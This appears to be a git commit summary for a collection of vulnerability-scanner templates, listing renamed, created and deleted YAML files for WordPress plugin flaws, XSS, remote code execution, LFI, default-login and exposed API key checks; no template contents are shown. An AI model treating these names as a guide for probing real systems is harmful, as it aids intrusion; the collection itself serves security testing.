poc/web/web-ftp-detect-11137.yaml | 43 +- poc/web/web-ftp-detect-11138.yaml | 5 +- poc/web/web-local-craft-11139.yaml | 3 +- poc/web/web-service-panel.yaml | 22 +- poc/web/webcamxp-5-11122.yaml | 34 - poc/web/webcamxp-5.yaml | 21 + poc/web/webeditors-11129.yaml | 28 + poc/web/webflow-takeover-11131.yaml | 15 - poc/web/webflow-takeover-11132.yaml | 8 +- poc/web/webflow-takeover-11134.yaml | 18 + poc/web/webflow-takeover.yaml | 23 +- poc/web/weblogic-weak-login-11156.yaml | 14 +- poc/web/weblogic-weak-login.yaml | 61 - poc/web/webmin-panel-11158.yaml | 17 + poc/web/webmin-panel-11159.yaml | 17 - poc/web/webmodule-ee-panel-11160.yaml | 3 +- poc/web/webmodule-ee-panel-11161.yaml | 28 - poc/web/webmodule-ee-panel.yaml | 22 +- poc/web/webui-rce-11170.yaml | 21 - poc/web/webui-rce-11172.yaml | 10 +- poc/web/webui-rce-11173.yaml | 9 +- poc/web/webview-addjavascript-interface.yaml | 12 +- poc/web/webview-javascript.yaml | 11 +- poc/web/webview-load-url-11181.yaml | 5 +- poc/web/webview-universal-access-11184.yaml | 16 + poc/web/webview-universal-access-11185.yaml | 12 - poc/web/xp-webcam-11698.yaml | 22 + .../{xp-webcam-11697.yaml => xp-webcam.yaml} | 0 poc/wordpress/alfacgiapi-wordpress-255.yaml | 2 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- poc/wordpress/easy-wp-smtp-listing-7157.yaml | 20 + poc/wordpress/feedwordpress-xss-7459.yaml | 35 - poc/wordpress/feedwordpress-xss.yaml | 8 +- .../nativechurch-wp-theme-lfd-9001.yaml | 26 - .../nativechurch-wp-theme-lfd-9004.yaml | 22 - .../trilithic-viewpoint-default-10835.yaml | 18 +- poc/wordpress/trilithic-viewpoint-login.yaml | 40 - .../viewpoint-system-status-11016.yaml | 19 + .../viewpoint-system-status-11018.yaml | 20 - poc/wordpress/viewpoint-system-status.yaml | 3 +- .../wordpress-accessible-wpconfig-11234.yaml | 22 + .../wordpress-affiliatewp-log-11240.yaml | 23 - .../wordpress-affiliatewp-log-11243.yaml | 23 + .../wordpress-affiliatewp-log-11244.yaml | 1 - ...ordpress-bbpress-plugin-listing-11247.yaml | 31 + .../wordpress-bbpress-plugin-listing.yaml | 23 - .../wordpress-db-backup-listing-11250.yaml | 6 +- poc/wordpress/wordpress-db-repair.yaml | 26 + ...58.yaml => wordpress-debug-log-11259.yaml} | 0 poc/wordpress/wordpress-detect-11261.yaml | 2 +- .../wordpress-directory-listing-11265.yaml | 25 - .../wordpress-directory-listing-11266.yaml | 10 +- ...dpress-elementor-plugin-listing-11267.yaml | 3 +- ...dpress-elementor-plugin-listing-11269.yaml | 31 + ...ls-verification-for-woocommerce-11271.yaml | 25 + ...s-emails-verification-for-woocommerce.yaml | 10 +- .../wordpress-emergency-script-11277.yaml | 8 +- poc/wordpress/wordpress-git-config-11279.yaml | 3 +- ...press-gtranslate-plugin-listing-11282.yaml | 12 +- ...press-gtranslate-plugin-listing-11284.yaml | 23 + ...ordpress-infinitewp-auth-bypass-11285.yaml | 19 +- ...ordpress-infinitewp-auth-bypass-11286.yaml | 13 +- poc/wordpress/wordpress-instagram-feed.yaml | 49 + .../wordpress-installer-log-11290.yaml | 2 +- poc/wordpress/wordpress-lfi(1).yaml | 25 + poc/wordpress/wordpress-plugins-detect.yaml | 30 +- poc/wordpress/wordpress-plugins2.yaml | 29 +- .../wordpress-rce-simplefilelist-11302.yaml | 73 + .../wordpress-rce-simplefilelist.yaml | 39 +- poc/wordpress/wordpress-rdf-user-enum.yaml | 10 +- ...ress-redirection-plugin-listing-11306.yaml | 22 - ...ess-redirection-plugin-listing-11308.yaml} | 0 poc/wordpress/wordpress-takeover.yaml | 23 +- .../wordpress-themes-detect-11316.yaml | 17 +- poc/wordpress/wordpress-themes-detect.yaml | 22 +- ...ordpress-total-upkeep-backup-download.yaml | 13 +- .../wordpress-updraftplus-pem-key-11325.yaml | 4 + poc/wordpress/wordpress-upload-data.yaml | 55 +- poc/wordpress/wordpress-user-enum-11333.yaml | 7 +- .../wordpress-weak-credentials-11334.yaml | 26 +- .../wordpress-weak-credentials-11335.yaml | 50 + .../wordpress-woocommerce-listing-11338.yaml | 7 +- .../wordpress-woocommerce-listing-11339.yaml | 19 +- .../wordpress-woocommerce-listing-11341.yaml | 23 + poc/wordpress/wordpress-woocommerce-sqli.yaml | 17 +- .../wordpress-wordfence-lfi-11348.yaml | 19 +- .../wordpress-wordfence-lfi-11350.yaml | 4 + .../wordpress-wordfence-lfi-11351.yaml | 25 - .../wordpress-wordfence-xss-11357.yaml | 20 +- .../wordpress-workflow (copy 1).yaml | 29 + poc/wordpress/wordpress-workflow-11363.yaml | 23 +- ...366.yaml => wordpress-workflow-11365.yaml} | 0 ...press-wpcourses-info-disclosure-11367.yaml | 31 - ...press-wpcourses-info-disclosure-11369.yaml | 31 + ...press-wpcourses-info-disclosure-11370.yaml | 37 +- ...press-wpcourses-info-disclosure-11371.yaml | 6 +- .../wordpress-zebra-form-xss-11377.yaml | 11 +- poc/wordpress/wordpress-zebra-form-xss.yaml | 35 +- poc/wordpress/wp-altair-listing-11405.yaml | 24 + ...ting-11406.yaml => wp-altair-listing.yaml} | 0 ...-11407.yaml => wp-ambience-xss-11408.yaml} | 0 poc/wordpress/wp-ambience-xss-11410.yaml | 26 +- poc/wordpress/wp-app-log-11411.yaml | 25 - poc/wordpress/wp-app-log-11412.yaml | 26 + poc/wordpress/wp-arforms-listing-11415.yaml | 22 - poc/wordpress/wp-arforms-listing-11418.yaml | 22 + poc/wordpress/wp-arforms-listing.yaml | 2 +- poc/wordpress/wp-church-admin-xss-11422.yaml | 25 + poc/wordpress/wp-church-admin-xss-11423.yaml | 24 - poc/wordpress/wp-code-snippets-xss-11425.yaml | 8 +- poc/wordpress/wp-code-snippets-xss-11426.yaml | 50 + poc/wordpress/wp-config-setup-11427.yaml | 19 - poc/wordpress/wp-config-setup-11428.yaml | 19 + poc/wordpress/wp-config-setup-11430.yaml | 5 +- poc/wordpress/wp-custom-tables-xss-11431.yaml | 25 - poc/wordpress/wp-custom-tables-xss-11434.yaml | 25 + .../wp-email-subscribers-listing.yaml | 23 - poc/wordpress/wp-finder-xss-11450.yaml | 7 +- poc/wordpress/wp-flagem-xss-11453.yaml | 3 +- .../wp-full-path-disclosure-11455.yaml | 16 - .../wp-full-path-disclosure-11457.yaml | 18 + poc/wordpress/wp-full-path-disclosure.yaml | 6 +- .../wp-grimag-open-redirect-11461.yaml | 12 +- .../wp-grimag-open-redirect-11462.yaml | 18 + .../wp-gtranslate-open-redirect-11463.yaml | 21 +- .../wp-gtranslate-open-redirect-11465.yaml | 22 + .../wp-gtranslate-open-redirect-11466.yaml | 4 +- .../wp-idx-broker-platinum-listing-11469.yaml | 31 - .../wp-idx-broker-platinum-listing.yaml | 22 + poc/wordpress/wp-install-11473.yaml | 21 + ...{wp-install-11475.yaml => wp-install.yaml} | 0 .../wp-iwp-client-listing-11478.yaml | 23 + ...-11479.yaml => wp-iwp-client-listing.yaml} | 0 poc/wordpress/wp-javospot-lfi-11480.yaml | 12 +- poc/wordpress/wp-javospot-lfi-11482.yaml | 14 +- poc/wordpress/wp-knews-xss-11487.yaml | 21 +- ...-11491.yaml => wp-license-file-11489.yaml} | 0 .../wp-mailchimp-log-exposure-11492.yaml | 13 +- .../wp-mailchimp-log-exposure-11494.yaml | 11 +- ...p-memphis-documents-library-lfi-11495.yaml | 26 + ...p-memphis-documents-library-lfi-11497.yaml | 14 +- ...p-memphis-documents-library-lfi-11498.yaml | 26 - ...p-memphis-documents-library-lfi-11499.yaml | 4 - poc/wordpress/wp-mstore-plugin-listing.yaml | 23 - .../wp-multiple-theme-ssrf-11513.yaml | 31 + poc/wordpress/wp-nextgen-xss-11518.yaml | 8 +- poc/wordpress/wp-nextgen-xss.yaml | 23 +- poc/wordpress/wp-oxygen-theme-lfi-11519.yaml | 22 +- ...fi-11523.yaml => wp-oxygen-theme-lfi.yaml} | 0 poc/wordpress/wp-phpfreechat-xss-11525.yaml | 29 + poc/wordpress/wp-phpfreechat-xss-11528.yaml | 8 +- ...p-plugin-1-flashgallery-listing-11532.yaml | 33 - poc/wordpress/wp-plugin-lifterlms-11536.yaml | 22 - poc/wordpress/wp-plugin-lifterlms.yaml | 4 +- ... wp-plugin-marmoset-viewer-xss-11537.yaml} | 0 .../wp-plugin-marmoset-viewer-xss.yaml | 50 +- .../wp-plugin-utlimate-member-11539.yaml | 3 +- .../wp-plugin-utlimate-member-11541.yaml | 23 + .../wp-plugin-utlimate-member-11542.yaml | 22 - poc/wordpress/wp-popup-listing-11543.yaml | 29 - poc/wordpress/wp-popup-listing.yaml | 21 + .../wp-prostore-open-redirect-11549.yaml | 14 +- poc/wordpress/wp-qards-listing-11551.yaml | 24 - ...sting.yaml => wp-qards-listing-11552.yaml} | 0 ... => wp-revslider-file-download-11555.yaml} | 0 poc/wordpress/wp-revslider-file-download.yaml | 4 - poc/wordpress/wp-securimage-xss-11556.yaml | 26 +- poc/wordpress/wp-securimage-xss-11559.yaml | 2 +- poc/wordpress/wp-securimage-xss-11560.yaml | 25 - poc/wordpress/wp-sfwd-lms-listing-11562.yaml | 22 + poc/wordpress/wp-sfwd-lms-listing-11564.yaml | 17 +- poc/wordpress/wp-simple-fields-lfi-11568.yaml | 14 +- ...i.yaml => wp-simple-fields-lfi-11571.yaml} | 0 poc/wordpress/wp-slideshow-xss-11572.yaml | 7 +- poc/wordpress/wp-slideshow-xss-11575.yaml | 28 - poc/wordpress/wp-slideshow-xss-11576.yaml | 29 + poc/wordpress/wp-socialfit-xss-11577.yaml | 27 - poc/wordpress/wp-tinymce-lfi.yaml | 10 +- poc/wordpress/wp-tutor-lfi-11598.yaml | 17 + ...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0 poc/wordpress/wp-upload-data-11602.yaml | 24 + poc/wordpress/wp-upload-data-11605.yaml | 29 - poc/wordpress/wp-vault-lfi-11608.yaml | 19 +- poc/wordpress/wp-vault-lfi-11609.yaml | 14 +- poc/wordpress/wp-vault-lfi-11611.yaml | 19 + poc/wordpress/wp-whmcs-xss.yaml | 8 +- ...-woocommerce-email-verification-11616.yaml | 16 +- .../wp-woocommerce-file-download-11620.yaml | 38 - .../wp-woocommerce-file-download.yaml | 25 + poc/wordpress/wp-xmlrpc-11629.yaml | 16 +- .../wp-xmlrpc-pingback-detection-11627.yaml | 2 +- poc/wordpress/wpdm-cache-session-11438.yaml | 6 +- poc/wordpress/wpdm-cache-session.yaml | 14 +- .../wpmudev-my-calender-xss-11502.yaml | 5 - .../wpmudev-my-calender-xss-11503.yaml | 29 + poc/wordpress/wpmudev-my-calender-xss.yaml | 58 +- poc/wordpress/wpmudev-pub-keys-11504.yaml | 3 + .../wptouch-open-redirect-11592.yaml | 30 +- .../wptouch-open-redirect-11594.yaml | 4 +- .../wptouch-open-redirect-11595.yaml | 25 + .../wptouch-plugin-open-redirect.yaml | 13 +- ...pringboot-actuators-jolokia-xxe-10429.yaml | 21 +- ...pringboot-actuators-jolokia-xxe-10432.yaml | 33 +- poc/xss/DOM-XSS-SiteMinder.yaml | 5 + poc/xss/Oracle-OAM-XSS.yaml | 4 - poc/xss/accessibility-helper-xss-18.yaml | 25 - poc/xss/accessibility-helper-xss-19.yaml | 30 - poc/xss/acme-xss-28.yaml | 21 +- poc/xss/acme-xss-30.yaml | 21 +- poc/xss/akamai-arl-xss-246.yaml | 40 - poc/xss/akamai-arl-xss-249.yaml | 6 +- poc/xss/blind-xss-user-agent.yaml | 79 +- poc/xss/blind-xss.yaml | 16 +- poc/xss/ckan-dom-based-xss-992.yaml | 3 +- poc/xss/ckan-dom-based-xss-993.yaml | 49 - poc/xss/coldfusion-debug-xss-1152.yaml | 61 +- ...ss.yaml => coldfusion-debug-xss-1153.yaml} | 0 poc/xss/concrete-xss-1174.yaml | 25 +- poc/xss/concrete-xss-1178.yaml | 35 - poc/xss/dom-xss-siteminder.yaml | 25 + poc/xss/elex-woocommerce-xss-7200.yaml | 48 - poc/xss/elex-woocommerce-xss.yaml | 42 - ...recms-xss.yaml => empirecms-xss-7218.yaml} | 0 poc/xss/empirecms-xss-7220.yaml | 25 - poc/xss/feedwordpress-xss-7459.yaml | 35 - poc/xss/feedwordpress-xss.yaml | 8 +- poc/xss/flow-flow-social-stream-xss-7524.yaml | 41 - poc/xss/flow-flow-social-stream-xss.yaml | 27 + poc/xss/geovision-geowebserver-xss-7600.yaml | 19 +- poc/xss/geovision-geowebserver-xss.yaml | 27 - poc/xss/global-domains-xss-7717.yaml | 24 +- poc/xss/header_blind_xss-7914.yaml | 14 +- poc/xss/httpbin-xss-8052.yaml | 28 - poc/xss/httpbin-xss.yaml | 15 + poc/xss/id-q-xss.yaml | 4 + poc/xss/java-melody-xss.yaml | 2 +- poc/xss/keycloak-xss-8480.yaml | 28 - poc/xss/laravel-ignition-xss-8593.yaml | 15 +- poc/xss/microweber-xss-8864.yaml | 12 +- poc/xss/microweber-xss.yaml | 35 - ...xss.yaml => mida-eframework-xss-8868.yaml} | 0 poc/xss/mida-eframework-xss-8869.yaml | 24 - poc/xss/moodle-xss-8950.yaml | 7 +- poc/xss/moodle-xss-8951.yaml | 25 +- poc/xss/moodle-xss-8952.yaml | 32 - ...ms-exchange-server-reflected-xss-8962.yaml | 27 + ...ms-exchange-server-reflected-xss-8964.yaml | 8 +- poc/xss/multiples-swagger-xss-indentify.yaml | 78 +- poc/xss/my-chatbot-xss-8978.yaml | 21 +- poc/xss/my-chatbot-xss-8979.yaml | 18 +- poc/xss/nginx-module-vts-xss-9106.yaml | 49 +- poc/xss/nginx-module-vts-xss-9108.yaml | 9 +- poc/xss/nginx-module-vts-xss-9109.yaml | 23 + poc/xss/oracle-ebs-xss-9375.yaml | 12 +- poc/xss/oracle-oam-xss.yaml | 24 - poc/xss/oracle-siebel-xss-9400.yaml | 25 +- poc/xss/oracle-siebel-xss.yaml | 34 + poc/xss/parentlink-xss-9466.yaml | 40 - poc/xss/parentlink-xss.yaml | 25 + poc/xss/php-timeclock-xss-9550.yaml | 27 + ...k-xss-9553.yaml => php-timeclock-xss.yaml} | 0 poc/xss/qcubed-xss-9749.yaml | 42 - poc/xss/qcubed-xss.yaml | 27 + poc/xss/rails6-xss-9798.yaml | 32 - poc/xss/rockmongo-xss-9901.yaml | 27 +- poc/xss/rockmongo-xss-9902.yaml | 28 - poc/xss/sassy-social-share-xss.yaml | 56 +- poc/xss/sick-beard-xss-10234.yaml | 26 + poc/xss/sick-beard-xss.yaml | 8 +- poc/xss/squirrelmail-add-xss-10515.yaml | 39 + poc/xss/squirrelmail-add-xss.yaml | 25 - poc/xss/thruk-xss-10759.yaml | 30 - poc/xss/thruk-xss.yaml | 3 +- poc/xss/tikiwiki-reflected-xss-10777.yaml | 28 +- poc/xss/tikiwiki-reflected-xss-10780.yaml | 19 + poc/xss/top-xss-params-10807.yaml | 2 +- poc/xss/top-xss-params-10809.yaml | 81 - poc/xss/turbocrm-xss-10850.yaml | 3 +- poc/xss/turbocrm-xss-10851.yaml | 4 +- poc/xss/vanguard-post-xss-10992.yaml | 21 +- poc/xss/vanguard-post-xss-10994.yaml | 3 +- ...11192.yaml => wems-manager-xss-11194.yaml} | 0 poc/xss/wems-manager-xss.yaml | 26 - poc/xss/wordpress-wordfence-xss-11357.yaml | 20 +- poc/xss/wordpress-zebra-form-xss-11377.yaml | 11 +- poc/xss/wordpress-zebra-form-xss.yaml | 35 +- ...-11407.yaml => wp-ambience-xss-11408.yaml} | 0 poc/xss/wp-ambience-xss-11410.yaml | 26 +- poc/xss/wp-church-admin-xss-11422.yaml | 25 + poc/xss/wp-church-admin-xss-11423.yaml | 24 - poc/xss/wp-code-snippets-xss-11425.yaml | 8 +- poc/xss/wp-code-snippets-xss-11426.yaml | 50 + poc/xss/wp-custom-tables-xss-11431.yaml | 25 - poc/xss/wp-custom-tables-xss-11434.yaml | 25 + poc/xss/wp-finder-xss-11450.yaml | 7 +- poc/xss/wp-flagem-xss-11453.yaml | 3 +- poc/xss/wp-knews-xss-11487.yaml | 21 +- poc/xss/wp-nextgen-xss-11518.yaml | 8 +- poc/xss/wp-nextgen-xss.yaml | 23 +- poc/xss/wp-phpfreechat-xss-11525.yaml | 29 + poc/xss/wp-phpfreechat-xss-11528.yaml | 8 +- ... wp-plugin-marmoset-viewer-xss-11537.yaml} | 0 poc/xss/wp-plugin-marmoset-viewer-xss.yaml | 50 +- poc/xss/wp-securimage-xss-11556.yaml | 26 +- poc/xss/wp-securimage-xss-11559.yaml | 2 +- poc/xss/wp-securimage-xss-11560.yaml | 25 - poc/xss/wp-slideshow-xss-11572.yaml | 7 +- poc/xss/wp-slideshow-xss-11575.yaml | 28 - poc/xss/wp-slideshow-xss-11576.yaml | 29 + poc/xss/wp-socialfit-xss-11577.yaml | 27 - poc/xss/wp-whmcs-xss.yaml | 8 +- poc/xss/wpmudev-my-calender-xss-11502.yaml | 5 - poc/xss/wpmudev-my-calender-xss-11503.yaml | 29 + poc/xss/wpmudev-my-calender-xss.yaml | 58 +- poc/xss/xss-prober.yaml | 66 +- 4995 files changed, 67139 insertions(+), 147637 deletions(-) delete mode 100644 poc/adobe/adobe-coldfusion-detect-82.yaml create mode 100644 poc/adobe/adobe-coldfusion-detect.yaml rename poc/adobe/{adobe-coldfusion-error-detect.yaml => adobe-coldfusion-error-detect-88.yaml} (100%) create mode 100644 poc/adobe/adobe-component-login-89.yaml delete mode 100644 poc/adobe/adobe-component-login-90.yaml delete mode 100644 poc/adobe/adobe-connect-central-login-95.yaml delete mode 100644 poc/adobe/adobe-connect-username-exposure-100.yaml rename poc/adobe/{adobe-connect-username-exposure-101.yaml => adobe-connect-username-exposure-98.yaml} (100%) create mode 100644 poc/adobe/adobe-connect-version-102.yaml rename poc/adobe/{adobe-connect-version.yaml => adobe-connect-version-104.yaml} (100%) create mode 100644 poc/adobe/adobe-experience-manager-login-105.yaml delete mode 100644 poc/adobe/adobe-experience-manager-login-106.yaml delete mode 100644 poc/adobe/aem-bg-servlet-127.yaml rename poc/adobe/{aem-bg-servlet.yaml => aem-bg-servlet-129.yaml} (100%) delete mode 100644 poc/adobe/aem-default-get-servlet-135.yaml create mode 100644 poc/adobe/aem-default-get-servlet-137.yaml create mode 100644 poc/adobe/aem-default-login-140.yaml delete mode 100644 poc/adobe/aem-detaction.yaml create mode 100644 poc/adobe/aem-detection-144.yaml delete mode 100644 poc/adobe/aem-detection-145.yaml create mode 100644 poc/adobe/aem-gql-servlet-147.yaml delete mode 100644 poc/adobe/aem-gql-servlet-149.yaml create mode 100644 poc/adobe/aem-groovyconsole-153.yaml create mode 100644 poc/adobe/aem-login-status-170.yaml rename poc/adobe/{aem-login-status-171.yaml => aem-login-status.yaml} (100%) delete mode 100644 poc/adobe/aem-merge-metadata-servlet-172.yaml create mode 100644 poc/adobe/aem-merge-metadata-servlet.yaml delete mode 100644 poc/adobe/aem-querybuilder-feed-servlet.yaml rename poc/adobe/{aem-querybuilder-internal-path-read-181.yaml => aem-querybuilder-internal-path-read-179.yaml} (100%) create mode 100644 poc/adobe/aem-querybuilder-json-servlet-182.yaml rename poc/adobe/{aem-wcm-suggestions-servlet-194.yaml => aem-wcm-suggestions-servlet-196.yaml} (100%) delete mode 100644 poc/airflow/airflow-configuration-exposure-230.yaml create mode 100644 poc/airflow/airflow-configuration-exposure.yaml create mode 100644 poc/airflow/airflow-detect-239.yaml rename poc/airflow/{airflow-detect-240.yaml => airflow-detect.yaml} (100%) create mode 100644 poc/airflow/unauthenticated-airflow-10884.yaml delete mode 100644 poc/apache/apache-apisix-panel-337.yaml create mode 100644 poc/apache/apache-apisix-panel-338.yaml delete mode 100644 poc/apache/apache-detect-348.yaml create mode 100644 poc/apache/apache-filename-enum-354.yaml delete mode 100644 poc/apache/apache-filename-enum.yaml create mode 100644 poc/apache/apache-flink-unauth-rce-356.yaml delete mode 100644 poc/apache/apache-guacamole-361.yaml create mode 100644 poc/apache/apache-guacamole.yaml create mode 100644 poc/apache/apache-nifi-rce.yaml delete mode 100644 poc/apache/apache-ofbiz-log4j-rce-366.yaml create mode 100644 poc/apache/apache-ofbiz-log4j-rce.yaml create mode 100644 poc/apache/apache-solr-log4j-cve-2021-44228.yaml delete mode 100644 poc/apache/apache-solr-log4j-rce-372.yaml create mode 100644 poc/apache/apache-tomcat-snoop-377.yaml create mode 100644 poc/apache/default-apache-test-all-6813.yaml rename poc/apache/{default-apache-test-all-6815.yaml => default-apache-test-all.yaml} (100%) create mode 100644 poc/apache/default-apache-test-page.yaml create mode 100644 poc/apache/default-apache2-ubuntu-page.yaml delete mode 100644 poc/api/apache-apisix-panel-337.yaml create mode 100644 poc/api/apache-apisix-panel-338.yaml create mode 100644 poc/api/api-abuseipdb-384.yaml delete mode 100644 poc/api/api-abuseipdb.yaml create mode 100644 poc/api/api-adafruit-io-387.yaml delete mode 100644 poc/api/api-adafruit-io.yaml rename poc/api/{api-alienvault-390.yaml => api-alienvault-389.yaml} (100%) delete mode 100644 poc/api/api-alienvault.yaml create mode 100644 poc/api/api-apigee-edge-391.yaml delete mode 100644 poc/api/api-apigee-edge.yaml create mode 100644 poc/api/api-appveyor-392.yaml delete mode 100644 poc/api/api-appveyor.yaml delete mode 100644 poc/api/api-bingmaps-395.yaml create mode 100644 poc/api/api-bitly.yaml create mode 100644 poc/api/api-blockchain-398.yaml delete mode 100644 poc/api/api-blockchain.yaml rename poc/api/{api-buildkite.yaml => api-buildkite-402.yaml} (100%) create mode 100644 poc/api/api-buttercms.yaml delete mode 100644 poc/api/api-calendly.yaml rename poc/api/{api-circleci-406.yaml => api-circleci.yaml} (100%) delete mode 100644 poc/api/api-clearbit-407.yaml create mode 100644 poc/api/api-clearbit.yaml create mode 100644 poc/api/api-covalent-412.yaml delete mode 100644 poc/api/api-covalent.yaml create mode 100644 poc/api/api-debounce-414.yaml delete mode 100644 poc/api/api-debounce.yaml rename poc/api/{api-dribbble.yaml => api-dribbble-417.yaml} (100%) delete mode 100644 poc/api/api-dropbox.yaml delete mode 100644 poc/api/api-europeana-421.yaml create mode 100644 poc/api/api-fastly-424.yaml delete mode 100644 poc/api/api-fastly.yml create mode 100644 poc/api/api-fontawesome-426.yaml delete mode 100644 poc/api/api-fontawesome.yaml delete mode 100644 poc/api/api-fullhunt-428.yaml create mode 100644 poc/api/api-fullhunt.yaml rename poc/api/{api-gitlab.yaml => api-gitlab.yml} (100%) create mode 100644 poc/api/api-hirak-rates-436.yaml delete mode 100644 poc/api/api-hirak-rates.yaml delete mode 100644 poc/api/api-iconfinder-439.yaml create mode 100644 poc/api/api-iconfinder.yaml delete mode 100644 poc/api/api-instatus-442.yaml create mode 100644 poc/api/api-instatus.yaml create mode 100644 poc/api/api-intercom-443.yaml delete mode 100644 poc/api/api-intercom.yaml delete mode 100644 poc/api/api-ipstack-444.yaml create mode 100644 poc/api/api-iterable-445.yaml delete mode 100644 poc/api/api-jumpcloud-446.yaml create mode 100644 poc/api/api-jumpcloud.yaml create mode 100644 poc/api/api-launchdarkly-449.yaml delete mode 100644 poc/api/api-launchdarkly.yaml rename poc/api/{api-loqate-453.yaml => api-loqate.yaml} (100%) create mode 100644 poc/api/api-malshare-457.yaml create mode 100644 poc/api/api-malwarebazaar.yaml create mode 100644 poc/api/api-mapbox.yaml rename poc/api/{api-mywot.yaml => api-mywot-467.yaml} (100%) delete mode 100644 poc/api/api-npm.yaml delete mode 100644 poc/api/api-onelogin-472.yaml create mode 100644 poc/api/api-onelogin.yaml rename poc/api/{api-openweather-473.yaml => api-openweather.yaml} (100%) delete mode 100644 poc/api/api-pastebin-477.yaml create mode 100644 poc/api/api-pastebin.yaml delete mode 100644 poc/api/api-petfinder-480.yaml create mode 100644 poc/api/api-petfinder.yaml create mode 100644 poc/api/api-pinata-481.yaml delete mode 100644 poc/api/api-pinata.yaml create mode 100644 poc/api/api-pivotaltracker.yaml delete mode 100644 poc/api/api-quip-484.yaml create mode 100644 poc/api/api-quip.yaml rename poc/api/{api-scanii-487.yaml => api-scanii-488.yaml} (100%) create mode 100644 poc/api/api-scanii.yaml delete mode 100644 poc/api/api-spotify-495.yaml create mode 100644 poc/api/api-spotify.yaml create mode 100644 poc/api/api-square.yaml create mode 100644 poc/api/api-stripe.yaml delete mode 100644 poc/api/api-stytch-500.yaml create mode 100644 poc/api/api-stytch.yaml create mode 100644 poc/api/api-tink-504.yaml delete mode 100644 poc/api/api-tink.yaml delete mode 100644 poc/api/api-travisci.yaml delete mode 100644 poc/api/api-twitter-507.yaml create mode 100644 poc/api/api-twitter.yaml create mode 100644 poc/api/api-urlscan-509.yaml rename poc/api/{api-virustotal-511.yaml => api-virustotal.yaml} (100%) create mode 100644 poc/api/api-visualstudio-513.yaml delete mode 100644 poc/api/api-visualstudio.yaml rename poc/api/{api-wakatime-514.yaml => api-wakatime.yaml} (100%) delete mode 100644 poc/api/api-wordcloud-517.yaml delete mode 100644 poc/api/api-youtube-519.yaml create mode 100644 poc/api/api-youtube.yaml create mode 100644 poc/api/apiman-panel-462.yaml create mode 100644 poc/api/apiman-panel-464.yaml create mode 100644 poc/api/apisix-default-login-491.yaml delete mode 100644 poc/api/arcgis-rest-api-532.yaml create mode 100644 poc/api/arcgis-rest-api-533.yaml create mode 100644 poc/api/bems-api-lfi-707.yaml rename poc/api/{bems-api-lfi-711.yaml => bems-api-lfi-712.yaml} (100%) create mode 100644 poc/api/burp-api-detect-810.yaml delete mode 100644 poc/api/burp-api-detect.yaml rename poc/api/{couchbase-buckets-api.yaml => couchbase-buckets-api-1232.yaml} (100%) create mode 100644 poc/api/couchbase-buckets-api-1233.yaml delete mode 100644 poc/api/exposed-glances-api-7308.yaml delete mode 100644 poc/api/exposed-glances-api-7309.yaml delete mode 100644 poc/api/fastapi-docs-7398.yaml create mode 100644 poc/api/gitlab-api-user-enum-7668.yaml delete mode 100644 poc/api/google-api-7771.yaml delete mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml create mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak.yaml create mode 100644 poc/api/kube-api-deployments.yaml create mode 100644 poc/api/kube-api-services-8514.yaml delete mode 100644 poc/api/kube-api-services.yaml rename poc/api/{mailchimp-api-11854.yaml => mailchimp-api(1).yaml} (100%) rename poc/api/{sendgrid-api-key-10140.yaml => sendgrid-api-key-10142.yaml} (100%) create mode 100644 poc/api/sendgrid-api-key.yaml create mode 100644 poc/api/slack-api(1).yaml delete mode 100644 poc/api/slack-api-11864.yaml delete mode 100644 poc/api/strapi-cms-detect.yaml create mode 100644 poc/api/strapi-page-10546.yaml rename poc/api/{strapi-page-10544.yaml => strapi-page.yaml} (100%) delete mode 100644 poc/api/stripe-api-key(1).yaml create mode 100644 poc/api/stripe-api-key-11869.yaml create mode 100644 poc/api/swagger-api-10594.yaml delete mode 100644 poc/api/swagger-api-10595.yaml delete mode 100644 poc/api/twilio-api-10860.yaml create mode 100644 poc/api/twilio-api-10861.yaml delete mode 100644 poc/api/wadl-api-11084.yaml create mode 100644 poc/api/yapi-detect-11720.yaml create mode 100644 poc/api/yapi-rce-11725.yaml create mode 100644 poc/atlassian/atlassian-crowd-panel-583.yaml delete mode 100644 poc/atlassian/atlassian-crowd-panel-584.yaml create mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/atlassian/jira-detect-8314.yaml create mode 100644 poc/atlassian/jira-service-desk-signup-8317.yaml delete mode 100644 poc/atlassian/jira-service-desk-signup-8321.yaml delete mode 100644 poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml delete mode 100644 poc/atlassian/jira-unauthenticated-projects-8335.yaml create mode 100644 poc/atlassian/jira-unauthenticated-projects.yaml create mode 100644 poc/atlassian/jira-unauthenticated-screens-8338.yaml delete mode 100644 poc/atlassian/jira-unauthenticated-screens.yaml rename poc/atlassian/{jira_user_piker.yaml => jira-unauthenticated-user-picker.yaml} (100%) create mode 100644 poc/auth/acemanager-login-23.yaml rename poc/auth/{activemq-default-login-44.yaml => activemq-default-login.yaml} (100%) create mode 100644 poc/auth/adobe-component-login-89.yaml delete mode 100644 poc/auth/adobe-component-login-90.yaml delete mode 100644 poc/auth/adobe-connect-central-login-95.yaml create mode 100644 poc/auth/adobe-experience-manager-login-105.yaml delete mode 100644 poc/auth/adobe-experience-manager-login-106.yaml create mode 100644 poc/auth/aem-default-login-140.yaml create mode 100644 poc/auth/aem-login-status-170.yaml rename poc/auth/{aem-login-status-171.yaml => aem-login-status.yaml} (100%) create mode 100644 poc/auth/aims-password-mgmt-client-218.yaml create mode 100644 poc/auth/aims-password-mgmt-client-219.yaml delete mode 100644 poc/auth/aims-password-mgmt-client-221.yaml delete mode 100644 poc/auth/aims-password-portal-222.yaml create mode 100644 poc/auth/alibaba-mongoshake-unauth-268.yaml create mode 100644 poc/auth/alphaweb-default-login-275.yaml delete mode 100644 poc/auth/amazon-mws-auth-token-11845.yaml create mode 100644 poc/auth/amazon-mws-auth-token.yaml create mode 100644 poc/auth/ambari-default-login-287.yaml create mode 100644 poc/auth/amcrest-login-296.yaml delete mode 100644 poc/auth/amcrest-login-297.yaml delete mode 100644 poc/auth/ametys-admin-login-300.yaml create mode 100644 poc/auth/ametys-admin-login-301.yaml create mode 100644 poc/auth/apache-flink-unauth-rce-356.yaml rename poc/auth/{apc-ups-login-382.yaml => apc-ups-login.yaml} (100%) delete mode 100644 poc/auth/api-onelogin-472.yaml create mode 100644 poc/auth/api-onelogin.yaml create mode 100644 